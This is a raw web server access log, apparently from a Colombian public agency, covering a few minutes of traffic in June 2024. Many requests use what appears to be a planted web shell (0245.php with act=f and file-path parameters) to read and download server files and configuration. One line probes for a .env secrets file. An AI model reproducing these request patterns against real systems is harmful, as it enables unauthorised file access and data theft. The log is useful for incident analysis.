yJJH86WGktKxnpdKnnXLVBSNk/67qCHKQpGwOv50nt/wsrnZqby+KYlJDwCzgp3xDktNwyPY8DxHZSeVaTlGsaMLno4nOXPOG/yZ5KavpZ6z3XLeEJ0Im1HmA4v+V6VQTq75CEEzhCo+Ld2XNU4Om6mSvSExEj+3fjNAVXZ9AzWW5meq/HXlBQ/4azHXwPLPcg8slWzRerN+nfdU0pxzGi55GmpMBDgRO8MKMKesA6bsaTh2JYT3dUeSFqWJdpJBZ3uQtlNbjFVnH6yczWd&u=U2FsdGVkX19yK33BdqEu9xqygD4YleuBQJqDykaOtcV7Soz3t48KWzKjFSEATjld&y=U2FsdGVkX18L5Q9tujEOm2OtDXQMmnA1eqxtdV4cS1gvQbqWpPSNOSMCozsI44tk HTTP/1.1" 200 26
186.102.59.112 - - [16/Jun/2024:14:59:48 -0500] "GET /kwssiamovil/sm/acme/a?s=U2FsdGVkX19rJFr1hD1naPPQYqGVnJpHRnvODIOnq5DEvCARMqh2hMFzrsHJAAaMqzfY52oUSABTT42teszxCX1wdTlgDDVzx1Dm9FYBcbMteDjLvfe4/Y6V0L/JWjaidZPcWmOMdHTN087rZjaf+9fljzLlDsGes5FENU0/RDM=&u=U2FsdGVkX19yK33BdqEu9xqygD4YleuBQJqDykaOtcV7Soz3t48KWzKjFSEATjld&y=U2FsdGVkX18L5Q9tujEOm2OtDXQMmnA1eqxtdV4cS1gvQbqWpPSNOSMCozsI44tk HTTP/1.1" 200 26
186.102.59.112 - - [16/Jun/2024:14:59:48 -0500] "GET /kwssiamovil/sm/acme/a?s=U2FsdGVkX18QVXWfW/tw064P3qNG5phMktNtruhKYqR2DBO24u8SCSkT5CAFLi2o4WXLV3ffPp/s6mykDFNCQXHiChWDrPuP2lCxmTpHLzXa6nSWBBEOgWhCUnm9uMRo0q0uY+lrxygdZfzAyaTv3oMtiLieryNPaVJNbRozIFE=&u=U2FsdGVkX19yK33BdqEu9xqygD4YleuBQJqDykaOtcV7Soz3t48KWzKjFSEATjld&y=U2FsdGVkX18L5Q9tujEOm2OtDXQMmnA1eqxtdV4cS1gvQbqWpPSNOSMCozsI44tk HTTP/1.1" 200 26
186.102.59.112 - - [16/Jun/2024:14:59:49 -0500] "GET /kwssiamovil/sm/acme/a?s=U2FsdGVkX19VwWhJluZrshQJ/8Mf3eJeRhW2PSP8dQpciPUGsenduDKu0PXlSF8pScr3Q2697NERiCjT8yYUHVSBakmRzPyNz/w+p50SzmBbeUwTGNsiT8xNri1Rkf7AvStGjHEnBqtN9pY+Gzr/cRbjbOmreiOOjPjLfrt1wQM=&u=U2FsdGVkX19yK33BdqEu9xqygD4YleuBQJqDykaOtcV7Soz3t48KWzKjFSEATjld&y=U2FsdGVkX18L5Q9tujEOm2OtDXQMmnA1eqxtdV4cS1gvQbqWpPSNOSMCozsI44tk HTTP/1.1" 200 26
186.102.59.112 - - [16/Jun/2024:14:59:49 -0500] "GET /kwssiamovil/sm/acme/a?s=U2FsdGVkX19VySv5+mREhtSzAWt9fQcgSBLNm50o+n8fAhb1Ko6V/A/NizNPPGslu/eBl2xNm+ZmyuN+o+xhk4N5tFjibr5JYM8X2yfm4NctpOPDhHku0nK8x6+OKVwCEGN17FaCvRbDTSAERShlyUkKDem7m84MkBsoRJeNBp7S5GsTFhTWmvM5wNMQtCBso2P8uP5MIufQxFF0wdUpQw==&u=U2FsdGVkX19yK33BdqEu9xqygD4YleuBQJqDykaOtcV7Soz3t48KWzKjFSEATjld&y=U2FsdGVkX18L5Q9tujEOm2OtDXQMmnA1eqxtdV4cS1gvQbqWpPSNOSMCozsI44tk HTTP/1.1" 200 26
47.128.99.20 - - [16/Jun/2024:14:59:45 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5CBLA%5Cresoluciones%5CAUTOS+2021%5C&f=2053.pdf&ft=info&fullhexdump=1 HTTP/1.1" 200 660441
216.244.66.195 - - [16/Jun/2024:14:59:59 -0500] "GET /BLA/resoluciones/AUTOS%202010/6654.pdf HTTP/1.1" 200 155473
47.128.36.34 - - [16/Jun/2024:15:00:06 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5CBLA%5Cresoluciones%5CAUTOS+2021%5C&f=6328.pdf&ft=info&fullhexdump=1 HTTP/1.1" 200 728104
172.22.2.4 - - [16/Jun/2024:14:58:32 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 58273
201.245.192.253 - - [16/Jun/2024:15:00:22 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
47.128.51.15 - - [16/Jun/2024:15:00:27 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5CBLA%5Cresoluciones%5CAUTOS+2021%5C&f=5993.pdf&ft=info&fullhexdump=1 HTTP/1.1" 200 684007
216.244.66.195 - - [16/Jun/2024:15:00:35 -0500] "GET /BLA/resoluciones/AUTOS%202011/2208.pdf HTTP/1.1" 200 218295
47.128.16.188 - - [16/Jun/2024:15:00:48 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5CBLA%5Cresoluciones%5CAUTOS+2021%5C&f=4162.pdf&ft=info&fullhexdump=1 HTTP/1.1" 200 610649
216.244.66.195 - - [16/Jun/2024:15:01:04 -0500] "GET /BLA/resoluciones/AUTOS%202011/3823.pdf HTTP/1.1" 200 333346
47.128.42.149 - - [16/Jun/2024:15:01:09 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5CphpMyAdmin2%5C&f=DCO&ft=code&white=1 HTTP/1.1" 200 1044
185.244.36.221 - - [16/Jun/2024:15:01:12 -0500] "GET / HTTP/1.1" 200 319
201.245.192.253 - - [16/Jun/2024:15:01:13 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 36347
201.245.192.253 - - [16/Jun/2024:15:01:22 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
186.154.121.126 - - [16/Jun/2024:15:01:27 -0500] "GET /sipse/faces/faces/autenticacion.xhtml HTTP/1.1" 200 12733
186.154.121.126 - - [16/Jun/2024:15:01:27 -0500] "GET /sipse/js/disable_browser_buttons.js HTTP/1.1" 200 3230
186.154.121.126 - - [16/Jun/2024:15:01:27 -0500] "GET /sipse/css/custom_css_sg.css HTTP/1.1" 200 9694
186.154.121.126 - - [16/Jun/2024:15:01:27 -0500] "GET /sipse/css/custom_css_sg_prime_login.css HTTP/1.1" 200 443
186.154.121.126 - - [16/Jun/2024:15:01:27 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.css;jsessionid=b7XeAaH0PBaTV0wOvTn7efSS.undefined?ln=primefaces&v=4.0 HTTP/1.1" 200 542
186.154.121.126 - - [16/Jun/2024:15:01:27 -0500] "GET /sipse/js/funciones.js HTTP/1.1" 200 12592
186.154.121.126 - - [16/Jun/2024:15:01:27 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery.js;jsessionid=b7XeAaH0PBaTV0wOvTn7efSS.undefined?ln=primefaces&v=4.0 HTTP/1.1" 200 105384
186.154.121.126 - - [16/Jun/2024:15:01:27 -0500] "GET /sipse/faces/javax.faces.resource/theme.css?ln=primefaces-sipse HTTP/1.1" 200 50058
186.154.121.126 - - [16/Jun/2024:15:01:27 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.css;jsessionid=b7XeAaH0PBaTV0wOvTn7efSS.undefined?ln=primefaces&v=4.0 HTTP/1.1" 200 53295
186.154.121.126 - - [16/Jun/2024:15:01:27 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery-plugins.js;jsessionid=b7XeAaH0PBaTV0wOvTn7efSS.undefined?ln=primefaces&v=4.0 HTTP/1.1" 200 220526
186.154.121.126 - - [16/Jun/2024:15:01:27 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.js;jsessionid=b7XeAaH0PBaTV0wOvTn7efSS.undefined?ln=primefaces&v=4.0 HTTP/1.1" 200 87560
186.154.121.126 - - [16/Jun/2024:15:01:27 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.js;jsessionid=b7XeAaH0PBaTV0wOvTn7efSS.undefined?ln=primefaces&v=4.0 HTTP/1.1" 200 276924
186.154.121.126 - - [16/Jun/2024:15:01:28 -0500] "GET /sipse/faces/javax.faces.resource/images/ui-icons_898989_256x240.png?ln=primefaces-aristo HTTP/1.1" 200 5355
186.154.121.126 - - [16/Jun/2024:15:01:28 -0500] "GET /sipse/css/imagen/logoSDG.png HTTP/1.1" 200 53064
186.154.121.126 - - [16/Jun/2024:15:01:28 -0500] "GET /sipse/css/imagen/loginimg.png HTTP/1.1" 200 71635
186.154.121.126 - - [16/Jun/2024:15:01:28 -0500] "GET /sipse/faces/faces/index.xhtml HTTP/1.1" 200 677
186.154.121.126 - - [16/Jun/2024:15:01:28 -0500] "GET /sipse/faces/javax.faces.resource/theme.css?ln=primefaces-sipse HTTP/1.1" 304 -
186.154.121.126 - - [16/Jun/2024:15:01:28 -0500] "GET /favicon.ico HTTP/1.1" 200 7782
186.154.121.126 - - [16/Jun/2024:15:01:28 -0500] "GET /sipse/faces/faces/faces/autenticacion.xhtml HTTP/1.1" 200 12411
186.154.121.126 - - [16/Jun/2024:15:01:28 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.css?ln=primefaces&v=4.0 HTTP/1.1" 200 542
186.154.121.126 - - [16/Jun/2024:15:01:28 -0500] "GET /sipse/faces/javax.faces.resource/theme.css?ln=primefaces-sipse HTTP/1.1" 304 -
186.154.121.126 - - [16/Jun/2024:15:01:28 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.js?ln=primefaces&v=4.0 HTTP/1.1" 200 87560
186.154.121.126 - - [16/Jun/2024:15:01:28 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.css?ln=primefaces&v=4.0 HTTP/1.1" 200 53295
186.154.121.126 - - [16/Jun/2024:15:01:28 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery-plugins.js?ln=primefaces&v=4.0 HTTP/1.1" 200 220526
186.154.121.126 - - [16/Jun/2024:15:01:28 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery.js?ln=primefaces&v=4.0 HTTP/1.1" 200 105384
186.154.121.126 - - [16/Jun/2024:15:01:28 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.js?ln=primefaces&v=4.0 HTTP/1.1" 200 276924
186.154.121.126 - - [16/Jun/2024:15:01:30 -0500] "POST /sipse/faces/autenticacion.xhtml HTTP/1.1" 200 16889
186.154.121.126 - - [16/Jun/2024:15:01:30 -0500] "GET /sipse/css/custom_css_sg_prime.css HTTP/1.1" 200 5201
186.154.121.126 - - [16/Jun/2024:15:01:30 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.154.121.126 - - [16/Jun/2024:15:01:30 -0500] "GET /sipse/faces/javax.faces.resource/theme.css?ln=primefaces-sipse HTTP/1.1" 304 -
186.154.121.126 - - [16/Jun/2024:15:01:30 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.154.121.126 - - [16/Jun/2024:15:01:30 -0500] "GET /sipse/js/jquery.min.js HTTP/1.1" 200 85582
186.154.121.126 - - [16/Jun/2024:15:01:30 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.154.121.126 - - [16/Jun/2024:15:01:30 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery-plugins.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.154.121.126 - - [16/Jun/2024:15:01:30 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.154.121.126 - - [16/Jun/2024:15:01:30 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.154.121.126 - - [16/Jun/2024:15:01:30 -0500] "GET /sipse/css/v_mergente.css HTTP/1.1" 200 1505
186.154.121.126 - - [16/Jun/2024:15:01:30 -0500] "GET /sipse/css/imagen/contrasena.png HTTP/1.1" 404 383
186.154.121.126 - - [16/Jun/2024:15:01:30 -0500] "GET /sipse/imagenes/cargando.gif HTTP/1.1" 200 36959
186.154.121.126 - - [16/Jun/2024:15:01:30 -0500] "GET /sipse/imagenes/logoAplicacion.jpg HTTP/1.1" 200 155084
186.154.121.126 - - [16/Jun/2024:15:01:30 -0500] "GET /sipse/faces/javax.faces.resource/messages/messages.png?ln=primefaces&v=4.0 HTTP/1.1" 200 27209
47.128.17.52 - - [16/Jun/2024:15:01:30 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=C%3A%5CAmbienteBogota%5Ccounter%5C&f=phpinfo.php&ft=notepad&white=1 HTTP/1.1" 200 21
216.244.66.195 - - [16/Jun/2024:15:01:34 -0500] "GET /BLA/resoluciones/AUTOS%202011/3841.pdf HTTP/1.1" 200 231133
186.154.121.126 - - [16/Jun/2024:15:01:36 -0500] "GET /sipse/faces/javax.faces.resource/images/ui-bg_flat_0_2d5972_40x100.png?ln=primefaces-aristo HTTP/1.1" 200 183
186.154.121.126 - - [16/Jun/2024:15:01:36 -0500] "POST /sipse/faces/bienvenido.xhtml HTTP/1.1" 200 9852
186.154.121.126 - - [16/Jun/2024:15:01:37 -0500] "POST /sipse/faces/bienvenido.xhtml HTTP/1.1" 200 2073
186.154.121.126 - - [16/Jun/2024:15:01:38 -0500] "POST /sipse/faces/bienvenido.xhtml HTTP/1.1" 200 39079
186.154.121.126 - - [16/Jun/2024:15:01:38 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.154.121.126 - - [16/Jun/2024:15:01:38 -0500] "GET /sipse/faces/javax.faces.resource/theme.css?ln=primefaces-sipse HTTP/1.1" 304 -
186.154.121.126 - - [16/Jun/2024:15:01:38 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.154.121.126 - - [16/Jun/2024:15:01:38 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.154.121.126 - - [16/Jun/2024:15:01:38 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery-plugins.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.154.121.126 - - [16/Jun/2024:15:01:38 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.154.121.126 - - [16/Jun/2024:15:01:38 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.154.121.126 - - [16/Jun/2024:15:01:44 -0500] "GET /sipse/faces/javax.faces.resource/images/ui-icons_898989_256x240.png?ln=primefaces-aristo HTTP/1.1" 304 -
186.154.121.126 - - [16/Jun/2024:15:01:45 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/consultar.xhtml HTTP/1.1" 200 13046
186.154.121.126 - - [16/Jun/2024:15:01:48 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/consultar.xhtml HTTP/1.1" 200 135978
186.154.121.126 - - [16/Jun/2024:15:01:49 -0500] "GET /sipse/faces/javax.faces.resource/theme.css?ln=primefaces-sipse HTTP/1.1" 304 -
186.154.121.126 - - [16/Jun/2024:15:01:49 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.154.121.126 - - [16/Jun/2024:15:01:49 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.154.121.126 - - [16/Jun/2024:15:01:49 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.154.121.126 - - [16/Jun/2024:15:01:49 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery-plugins.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.154.121.126 - - [16/Jun/2024:15:01:49 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.154.121.126 - - [16/Jun/2024:15:01:49 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.154.121.126 - - [16/Jun/2024:15:01:49 -0500] "GET /sipse/faces/javax.faces.resource/dynamiccontent.properties?ln=primefaces&pfdrid=XjOR5%2F%2FfPAZAuY9TpWQeCiM0BhlXxYRBGKi%2FQcXXfeA%3D&pfdrid_c=false HTTP/1.1" 500 383
47.128.111.7 - - [16/Jun/2024:15:01:52 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5CBLA%5Cresoluciones%5CAUTOS+2021%5C&f=3519.pdf&ft=info&fullhexdump=1 HTTP/1.1" 200 1312805
216.244.66.195 - - [16/Jun/2024:15:02:00 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202016/1861.pdf HTTP/1.1" 200 971992
78.153.140.179 - - [16/Jun/2024:15:02:01 -0500] "GET /.env HTTP/1.1" 404 1018
78.153.140.179 - - [16/Jun/2024:15:02:01 -0500] "\x16\x03\x01" 400 226
186.154.121.126 - - [16/Jun/2024:15:02:01 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/consultarSolicitudProceso.xhtml HTTP/1.1" 200 9249063
156.59.198.135 - - [16/Jun/2024:15:02:13 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_sess_rdr1ksgu61eh0tuol1q4oe0gd1 HTTP/1.0" 200 1034
201.245.192.253 - - [16/Jun/2024:15:02:22 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
216.244.66.195 - - [16/Jun/2024:15:02:45 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202016/2220.pdf HTTP/1.1" 200 717166
47.128.98.206 - - [16/Jun/2024:15:02:56 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5Cvideos%5C&f=NuestraGente_Miquitos.flv&ft=notepad HTTP/1.1" 200 11521720
172.22.2.4 - - [16/Jun/2024:15:02:24 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 24523
216.244.66.195 - - [16/Jun/2024:15:03:16 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202016/2303.pdf HTTP/1.1" 200 365062
47.128.17.3 - - [16/Jun/2024:15:03:17 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5C&f=mysql_start.bat&ft=code&white=1 HTTP/1.1" 200 370
201.245.192.253 - - [16/Jun/2024:15:03:22 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
47.128.17.3 - - [16/Jun/2024:15:02:35 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cxampp%5Cxampp%5C&f=sqlnet.log&ft=info&fullhexdump=1 HTTP/1.1" 200 536399
216.245.221.92 - - [16/Jun/2024:15:03:27 -0500] "HEAD / HTTP/1.1" 200 -
47.128.36.51 - - [16/Jun/2024:15:03:38 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=C%3A%5C&f=WSUS+Client+Diagnostic+Tool.EXE HTTP/1.1" 200 104672
216.244.66.195 - - [16/Jun/2024:15:03:46 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202016/2337.pdf HTTP/1.1" 200 365243
47.128.35.113 - - [16/Jun/2024:15:03:59 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5Ccumbreclima%5Cwp-includes%5C&f=class-wp-customize-setting.php&ft=notepad&white=1 HTTP/1.1" 200 16317
66.249.66.20 - - [16/Jun/2024:15:04:14 -0500] "GET /Publicaciones/2024EE66749.pdf HTTP/1.1" 404 227
216.244.66.195 - - [16/Jun/2024:15:04:14 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202016/2428.pdf HTTP/1.1" 200 525416
47.128.57.38 - - [16/Jun/2024:15:04:20 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5CResiduos%5Cfarmaceutica%5Cfiles%5Csearch%5C&f=search98.xml&ft=download HTTP/1.1" 200 4904
201.245.192.253 - - [16/Jun/2024:15:04:22 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
47.128.36.92 - - [16/Jun/2024:15:04:41 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5Cxampp%5C&f=lang.php&ft=notepad&white=1 HTTP/1.1" 200 266
216.244.66.195 - - [16/Jun/2024:15:04:42 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202016/2442.pdf HTTP/1.1" 200 472302
47.128.126.46 - - [16/Jun/2024:15:05:02 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5CBLA%5Cresoluciones%5CRESOLUCIONES+2006%5CRES+2006+351-400&f=00000392.tif&ft=download HTTP/1.1" 200 39548
216.244.66.195 - - [16/Jun/2024:15:05:08 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202017/0216.pdf HTTP/1.1" 200 766680
172.22.2.4 - - [16/Jun/2024:15:03:31 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
201.245.192.253 - - [16/Jun/2024:15:05:22 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
47.128.99.193 - - [16/Jun/2024:15:05:23 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5CBLA%5Cresoluciones%5CAUTOS+2021%5C&f=3139.pdf&ft=notepad HTTP/1.1" 200 380617
173.252.127.10 - - [16/Jun/2024:15:05:29 -0500] "GET /images/25%20Incendio%20declaratoria.jpeg HTTP/1.1" 200 90327
47.128.37.111 - - [16/Jun/2024:15:05:44 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5CResiduos%5Cimpresion%5Cimages&f=page79.swf&ft=download HTTP/1.1" 200 28166
216.244.66.195 - - [16/Jun/2024:15:05:47 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202017/0304.pdf HTTP/1.1" 200 400206
172.22.2.4 - - [16/Jun/2024:15:04:21 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 59083
47.128.99.153 - - [16/Jun/2024:15:06:05 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5CResiduos%5Cimpresion%5Cimages&f=page74.swf&ft=download HTTP/1.1" 200 20111
201.245.192.253 - - [16/Jun/2024:15:06:11 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 36347
216.244.66.195 - - [16/Jun/2024:15:06:17 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202017/0580.pdf HTTP/1.1" 200 507943
201.245.192.253 - - [16/Jun/2024:15:06:22 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
47.128.44.217 - - [16/Jun/2024:15:06:26 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=C%3A%5CExtranet%5Cphp&f=php-win.exe&ft=download HTTP/1.1" 200 32825
216.244.66.195 - - [16/Jun/2024:15:06:47 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202017/0690.pdf HTTP/1.1" 200 744424
47.128.35.109 - - [16/Jun/2024:15:06:47 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5CBLA%5Cresoluciones%5CAUTOS+2021%5C&f=2147.pdf&ft=notepad HTTP/1.1" 200 392905
47.128.59.111 - - [16/Jun/2024:15:07:08 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5CBLA%5Cresoluciones%5CAUTOS+2021%5C&f=3931.pdf&ft=notepad HTTP/1.1" 200 384713
216.244.66.195 - - [16/Jun/2024:15:07:16 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202017/1093.pdf HTTP/1.1" 200 544746
201.245.192.253 - - [16/Jun/2024:15:07:22 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
47.128.29.52 - - [16/Jun/2024:15:07:29 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5CResiduos%5Ccosmeticos%5Cimages&f=page63.swf&ft=download HTTP/1.1" 200 20134
216.244.66.195 - - [16/Jun/2024:15:07:48 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202017/1104.pdf HTTP/1.1" 200 1888400
47.128.121.6 - - [16/Jun/2024:15:07:50 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5CResiduos%5Cimg&f=portada_cosmeticos.jpg&ft=download HTTP/1.1" 200 20121
47.128.34.46 - - [16/Jun/2024:15:08:11 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5Ccumbreclima%5Cwp-admin%5C&f=load-styles.php&ft=notepad&white=1 HTTP/1.1" 200 3149
216.244.66.195 - - [16/Jun/2024:15:08:15 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202017/1369.pdf HTTP/1.1" 200 407734
201.245.192.253 - - [16/Jun/2024:15:08:22 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
216.245.221.92 - - [16/Jun/2024:15:08:27 -0500] "HEAD / HTTP/1.1" 200 -
47.128.17.69 - - [16/Jun/2024:15:08:32 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5CBLA%5Cresoluciones%5CAUTOS+2021%5C&f=2409.pdf&ft=notepad&white=1 HTTP/1.1" 200 97993
216.244.66.195 - - [16/Jun/2024:15:08:42 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202017/1679.pdf HTTP/1.1" 200 424922
47.128.44.159 - - [16/Jun/2024:15:08:53 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5CMercuryMail%5C&f=mercury.exe&ft=download HTTP/1.1" 200 20132
216.244.66.195 - - [16/Jun/2024:15:09:07 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202017/1786.pdf HTTP/1.1" 200 380570
186.154.121.126 - - [16/Jun/2024:15:09:10 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/consultarSolicitudProceso.xhtml HTTP/1.1" 200 42354
186.154.121.126 - - [16/Jun/2024:15:09:10 -0500] "GET /sipse/faces/javax.faces.resource/theme.css?ln=primefaces-sipse HTTP/1.1" 304 -
186.154.121.126 - - [16/Jun/2024:15:09:10 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.154.121.126 - - [16/Jun/2024:15:09:10 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.154.121.126 - - [16/Jun/2024:15:09:10 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.154.121.126 - - [16/Jun/2024:15:09:10 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery-plugins.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.154.121.126 - - [16/Jun/2024:15:09:10 -0500] "GET /sipse/css/imagen/contrasena.png HTTP/1.1" 404 383
186.154.121.126 - - [16/Jun/2024:15:09:10 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.154.121.126 - - [16/Jun/2024:15:09:10 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.154.121.126 - - [16/Jun/2024:15:09:10 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/consultar.xhtml HTTP/1.1" 200 35662
186.154.121.126 - - [16/Jun/2024:15:09:11 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/consultar.xhtml HTTP/1.1" 200 35662
186.154.121.126 - - [16/Jun/2024:15:09:12 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/consultar.xhtml HTTP/1.1" 200 12939
47.128.119.234 - - [16/Jun/2024:15:09:14 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5Crequerimientos_old%5C&f=consulta.php&ft=notepad&white=1 HTTP/1.1" 200 1438
186.154.121.126 - - [16/Jun/2024:15:09:14 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/consultar.xhtml HTTP/1.1" 200 154678
